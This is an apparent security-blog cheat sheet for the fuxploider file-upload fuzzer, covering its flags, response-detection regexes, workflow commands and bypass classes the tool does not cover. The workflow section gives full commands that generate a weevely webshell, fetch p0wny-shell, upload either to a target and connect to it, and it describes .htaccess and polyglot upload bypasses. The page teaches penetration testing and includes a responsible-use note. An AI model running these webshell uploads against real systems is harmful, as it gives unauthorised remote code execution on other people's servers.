TechEarl

fuxploider Cheat Sheet: Every Flag I Actually Use

A field-tested fuxploider reference: target shaping, true/false response detection, extension fuzzing, cookies and headers, proxying, threading, and what to do once a webshell uploads. Grounded in the real argparse surface.

Ishan Karunaratne⏱️ 7 min readUpdated
Share thisCopied
fuxploider command reference cheat sheet covering target shaping, extension fuzzing, detection regex, threading, and post-upload pivots

fuxploider is a focused tool: it fuzzes a file upload form until it finds an extension the server accepts, then optionally uploads a real payload. The flag surface is small, and the knobs that matter (true/false regex, legitimate-extension list, template payload, cookies) are easy to misuse. This is the field reference for the flags I actually reach for, grouped by what I am trying to do.

Project status. fuxploider's last tagged release was v1.0 in 2018; upstream activity has been thin since. The CLI surface below is the one the current master branch ships, but new file-upload bypass classes (Nginx try_files quirks, IIS semicolon-truncation variants, modern polyglots) are not tracked by the tool. Treat it as a fast first-pass scanner against the well-known bypasses, then move to manual work for the long tail.

If you are new to the tool, the fuxploider tutorial walking through an attack against a vulnerable app is the right next stop. For the underlying classes of bug, the file upload vulnerabilities deep dive covers the taxonomy. If you are comparing options, the best file upload tools list for 2026 covers the alternatives.

Quick reference

fuxploider Command Reference

Every flag organised by task. Copy and adapt. Based on the actual argparse surface in fuxploider.py.

Target specification

-u 'https://target.example/upload.php'(`--url`) URL of the page that hosts the upload form. fuxploider parses the form, finds the file input, and submits there.
--not-regex 'not allowed|forbidden|invalid'Regex matching an upload failure response. Either this or --true-regex is required so the tool can tell pass from fail.
--true-regex 'upload (successful|complete)'Regex matching an upload success response. Inverse of --not-regex. Prefer this when the success page is more stable than the error page.
-d 'csrf=abc&extra=foo'(`--data`) Additional POST data sent alongside the file. Use for CSRF tokens or required hidden fields the form ships with.
--cookies 'session=abc; PHPSESSID=xyz'Cookies for HTTP requests. Required for any upload form that lives behind a login.

Payload and template files

-t ./payloads/shell.php(`--template`) Path to the malicious payload used during the code-execution detection phase. fuxploider uses it to confirm the upload actually executes; by default it tries all bundled templates.
-r 'unique-marker-1337'(`--regex-override`) Custom regex used to detect that the uploaded payload executed (typically a token your template echoes back). Override when the bundled detection logic does not match your custom template.
-f 10(`--filesize`) Generated file size in kB. Default 10. Useful when the target rejects empty or tiny uploads as suspicious.
--uploads-path '/uploads/'Path on the remote server where uploaded files are stored. fuxploider visits this path to fetch the uploaded artefact and confirm code execution.

Extension detection

-l 'php,phtml,phar,php5,php7'(`--legit-extensions`) Comma-separated list of valid extensions the server is expected to accept. Cuts the matrix when you already know the allowed set.
-n 100Number of common extensions to try. Default 100. Lower for a fast first pass; raise (or pair with -l) for a thorough run.
-s(`--skip-recon`) Skip the extension detection phase entirely. Useful when you already know which extension to upload as.
-yDetect ALL entry points; do not stop at the first working extension. Slower, more complete picture of the server's allowlist.

Form detection (manual mode)

-m(`--manual-form-detection`) Disable automatic form detection. Required when the upload form is JS-generated or sits behind logic fuxploider's parser cannot follow.
--input-name 'file'Manual: name of the file input field in the multipart body. Pair with -m.
--form-action '/upload'Manual: path of the form's action attribute. Pair with -m. Leave empty to submit to the same URL.

Threading and verbosity

-T 4(`--threads`) Worker thread count. Default 4. Higher speeds the matrix sweep but loses request ordering, which can confuse rate limiters and stateful WAFs.
-v(`--verbose`) Verbose. Prints what fuxploider is trying as it goes.
-vvVery verbose. Adds intermediate request and response details.
-vvvMaximum verbosity. Full request and response per attempt; noisy but invaluable when nothing is matching.

User-Agent

-U 'Mozilla/5.0 ...'(`--user-agent`) Custom User-Agent string. Mutually exclusive with --random-user-agent.
--random-user-agentUse a random UA per request. Helpful when the target throttles or fingerprints repeated UAs.

Proxy

--proxy 'http://127.0.0.1:8080'Proxy information in user:password@host:port form (no scheme required). Burp or mitmproxy on the loopback is the usual choice for inspecting the multipart bodies fuxploider builds.
--proxy-credsPrompt for proxy credentials at runtime instead of embedding them in --proxy. Cleaner for shared machines.

Post-detection pivot

(prompt to upload payload)Once a working extension is found, fuxploider prompts to upload the chosen template. Answer yes and point -t at your shell.
weevely generate <pass> shell.phpGenerate a stealthy PHP webshell with weevely, then pass it as -t. Connect with `weevely http://target/uploads/shell.php <pass>`.
curl https://.../p0wny.php > shell.phpp0wny-shell is a single-file PHP shell that renders a terminal UI in the browser. Drop it as the -t template, visit the upload URL, get a shell prompt.

How fuxploider actually decides whether an upload worked

fuxploider does not look at the HTTP status code. It posts the multipart body, reads the response, and runs the regex you gave it. If --not-regex matches the response body, the attempt is treated as a rejection. If --true-regex matches, the attempt is treated as a success. Get the regex wrong and the entire run is meaningless. Two practical rules:

  1. Read the rejection page in a browser before you run fuxploider. Copy the literal phrase the server prints when a bad file is rejected ("File type not allowed", "Sorry, only images", whatever it is). That phrase is your --not-regex. Anchor it tightly enough that a generic 500 page does not also match.
  2. Prefer --true-regex when the success page contains a stable marker (the saved filename, a "view your upload" link). Successes are less ambiguous than failures on apps that surface a dozen different validation errors.

Workflow templates

Starting points I keep around and adapt. Set the values once and every example reads from them.

Try it with your own values

Tune the common flags once. Every command below reads from this. Raising threads past 4 against a stateful WAF often makes detection unreliable; keep it low until you have ordering under control.

First pass against an unauthenticated upload page. Just a URL and a rejection regex. Good for a sanity check before you bother with cookies or custom payloads:

bash
python3 fuxploider.py -u ':target_url' --not-regex ':not_regex' :verbosity -T :threads

Authenticated upload, behind a session cookie. Grab the cookie from your browser DevTools first:

bash
python3 fuxploider.py -u ':target_url' \
         --cookies 'session=PASTE_SESSION_HERE; PHPSESSID=PASTE_PHPSESSID_HERE' \
         --not-regex ':not_regex' :verbosity -T :threads

Narrow the matrix to PHP-family extensions. When you already know which extensions the server's allowlist accepts (from a 404 inspection or a previous probe), seed -l with the legitimate set and let fuxploider iterate from there:

bash
python3 fuxploider.py -u ':target_url' \
         -l 'php,phtml,phar,php5,php7' \
         --not-regex ':not_regex' :verbosity -T :threads

Upload page with more than one form, plus a CSRF token in a hidden field. Use manual form-detection, point --input-name and --form-action at the right form, and pass the token via -d:

bash
python3 fuxploider.py -u ':target_url' \
         -m --input-name 'file' --form-action '/upload' \
         -d 'csrf_token=PASTE_TOKEN_HERE' \
         --cookies 'session=PASTE_SESSION_HERE' \
         --not-regex ':not_regex' :verbosity -T :threads

Route through Burp to inspect every multipart body fuxploider builds. Run Burp on the default 127.0.0.1:8080, drop the proxy, watch the requests stream past:

bash
python3 fuxploider.py -u ':target_url' \
         --proxy '127.0.0.1:8080' \
         --not-regex ':not_regex' :verbosity -T 1

Custom payload, ready to drop a webshell once an extension passes. Generate the shell first, then point -t at it:

bash
weevely generate hunter2 ./payloads/shell.php
python3 fuxploider.py -u 'https://target.example/upload.php' \
           -t ./payloads/shell.php \
           -l 'php,phtml,phar' \
           --not-regex 'not allowed|invalid'

Once fuxploider reports a working combination and the file is on disk, connect:

bash
weevely http://target.example/uploads/shell.php hunter2

If you would rather use a browser-resident shell, p0wny is the one-file option. Drop it as the template, visit the uploaded URL, type into the page:

bash
curl -fsSL https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php -o ./payloads/p0wny.php
python3 fuxploider.py -u 'https://target.example/upload.php' \
           -t ./payloads/p0wny.php \
           -l 'php,phtml,phar' \
           --not-regex 'not allowed|invalid'

What fuxploider does not do

fuxploider is fast at sweeping the extension matrix. It does not implement every parser-level bypass that ends up working in real engagements. Worth knowing:

  • Apache .phP (and other case-flip) parsing quirks. On older mod_php installs, Apache treats .phP, .Php, and uncommon aliases like .phtm as PHP because the handler is registered case-insensitively. The full case-flip catalogue is in the file upload extension bypass guide; seed -l with the variants when you suspect them.
  • .htaccess override uploads. If the target writes uploads to a directory where .htaccess is honoured, uploading a custom .htaccess that adds a handler for an innocuous extension (AddType application/x-httpd-php .jpg) turns every previously-allowed JPEG into PHP. fuxploider does not chain a .htaccess write with a subsequent payload upload.
  • Image polyglots. A JPEG with PHP appended after the image data passes both magic-byte and naive MIME checks, and executes if the server interprets the extension as PHP. fuxploider lets you upload polyglots if you craft them yourself and pass them via -t, but it does not generate them.
  • Content-Type spoofing per multipart part. fuxploider does not expose a flag to set arbitrary Content-Type values per uploaded file; the multipart body uses the type inferred from the template file. The MIME spoofing bypass guide covers the layered bypasses; develop those in Burp Repeater rather than fuxploider.
  • Double-extension nuances on Nginx and IIS. Apache parses shell.php.jpg as PHP only with specific config. Nginx with try_files parses very differently. IIS has its own semicolon-truncation history (shell.asp;.jpg). The double-extension upload bypass guide has the per-server matrix.

If a fuxploider run comes up empty, the next move is rarely "more threads". It is reading the rejection page carefully, then reaching for one of the bypass classes above.

Flags I almost never reach for

  • Raising -T past 4 against any production-adjacent target. The speed gain on a small extension list is not worth the lost request ordering when the target has a rate limiter or a stateful WAF.
  • --random-user-agent once I have already identified a UA the target accepts. The randomisation often pulls a UA that the WAF flags more aggressively than a fixed modern browser string.

A note on responsible use

Every flag above is dual use. The same upload that drops a benign GIF on a CTF lab is the one that drops a webshell on a production app. Use fuxploider against systems you own or are explicitly authorised to test. See the legal framing in the file upload vulnerabilities deep dive.

Sources

Authoritative references this article was fact-checked against.

TagsfuxploiderFile UploadCheat SheetPenetration TestingSecurity

Found this useful? Pass it on.

Copied

Ishan Karunaratne

Tech Architect · Software Engineer · AI/DevOps

Tech architect and software engineer with 20+ years building software, Linux systems, and DevOps infrastructure, and lately working AI into the stack. Currently Chief Technology Officer at a healthcare tech startup, which is where most of these field notes come from.

More by IshanLinkedIn
Keep reading

Related posts

Security

LFImap Cheat Sheet: Every Flag I Actually Use

A field-tested LFImap reference: target selection, traversal wordlists, PHP wrappers (filter/input/data/expect/file), command injection, RFI, log/proxy/cookie shaping, second-order requests, and the `PWN` placeholder. Grounded in the real argparse surface.

Security

Dalfox Cheat Sheet: Every Flag I Actually Use

A field-tested Dalfox v3 reference: target specification, detection tuning, parameter mining, blind XSS callbacks, evasion, pipeline patterns, and output shaping. Updated for the v3 Rust rewrite that consolidates everything under `dalfox scan`.

Security

XXEinjector Cheat Sheet: Every Flag I Actually Use

A field reference for XXEinjector: target options, request file format with the XXEINJECT marker, OOB and direct modes, PHP filter wrappers, file enumeration, logging, and custom listeners. Grouped by what you are trying to do.